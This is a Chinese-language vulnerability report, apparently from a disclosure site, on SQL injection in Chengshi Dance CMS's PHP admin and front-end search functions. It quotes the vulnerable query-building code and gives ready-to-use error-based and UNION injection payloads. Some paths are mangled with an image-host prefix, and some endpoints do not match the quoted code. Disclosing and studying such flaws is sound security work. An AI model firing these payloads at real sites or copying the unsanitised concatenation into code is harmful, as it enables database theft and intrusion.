程氏舞曲CMS最新php版本多处sql注入漏洞

### 简要描述： 操蛋捏。 ### 详细说明： 昨天刚下载的，2.16号更新的版本。 第一处在管理后台：https://images.seebug.org/upload/app/controllers/admin/news.php第66行 ``` public function so() { $key = $this->input->get('key');//使用get方式获取相关参数，没做处理 $user = $this->input->get('user'); $cid = $this->input->get('cid'); $page = $this->input->get('page'); if(empty($page)) $page=1; $sql_string = "SELECT * FROM ".CS_SqlPrefix."news where 1=1"; if($key){ $sql_string.= " and CS_Name like '%".$key."%'"; } if($user){ $sql_string.= " and CS_User like '%".$user."%'"; } if($cid){ if($cid=="-1"){ $sql_string.= " and cs_hid=1"; }elseif($cid=="-2"){ $sql_string.= " and cs_yid=1"; }else{ $sql_string.= " and CS_CID=".$cid.""; } } $sql_string.= " order by CS_AddTime desc";//拼接字符串 $query = $this->db->query($sql_string); //没处理带入查询 $total = $query->num_rows(); ``` 请求url：http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/admin/dance/so/?key=1' AND (SELECT 5960 FROM(SELECT COUNT(*),CONCAT((select user()),(SELECT (CASE WHEN (5960=5960) THEN 1 ELSE 0 END)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)%23 利用显错读取信息。 [<img src="https://images.seebug.org/upload/201402/180920338e24e8172c1119ba2cfdb52b05a42d33.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/180920338e24e8172c1119ba2cfdb52b05a42d33.png) 还有一处在前台：https://images.seebug.org/upload/app/controllers/singer.php第127行 ``` public function so() { $data='';$data_content=''; $fid = $this->security->xss_clean($this->uri->segment(3)); //方式 $key = $this->security->xss_clean($this->uri->segment(4)); //关键字 $page = intval($this->security->xss_clean($this->uri->segment(5))); //页数 if($page==0) $page=1; if(empty($key)) $key = $this->input->post('key', TRUE);//以post方式接受key值 ``` 跟踪变量同一文件165行 ： ``` if($fid=='zm' && in_array(strtoupper($key),$zimu_arr)){ //按字母搜索 $posarr=array_keys($zimu_arr,strtoupper($key)); $pos=$posarr[0]; $sqlstr="SELECT * FROM ".CS_SqlPrefix."singer where CS_YID=0 and ((ord( substring( CS_Name, 1, 1 ) ) -65536>=".($zimu_arr1[$pos])." and ord( substring( CS_Name, 1, 1 ) ) -65536<=".($zimu_arr2[$pos]).")) or UPPER(substring( CS_Name, 1, 1 ))='".$zimu_arr[$pos]."'"; }else{ $sqlstr="select * from ".CS_SqlPrefix."singer where CS_YID=0 and CS_Name like '%".$key."%' order by CS_AddTime desc";//$key带入查询，中间没做处理 } ``` [<img src="https://images.seebug.org/upload/201402/18092519b9d8b9104c8c44b319c0436a1d3a289e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/18092519b9d8b9104c8c44b319c0436a1d3a289e.png) ### 漏洞证明： 第二处没法根据显错读取信息，sql语句不过关... 但是可以使用union读取字段等信息(附上payload：http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/vod/so/key/%25%27%20union%20select%201%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%23) 返回正确，表示有39个字段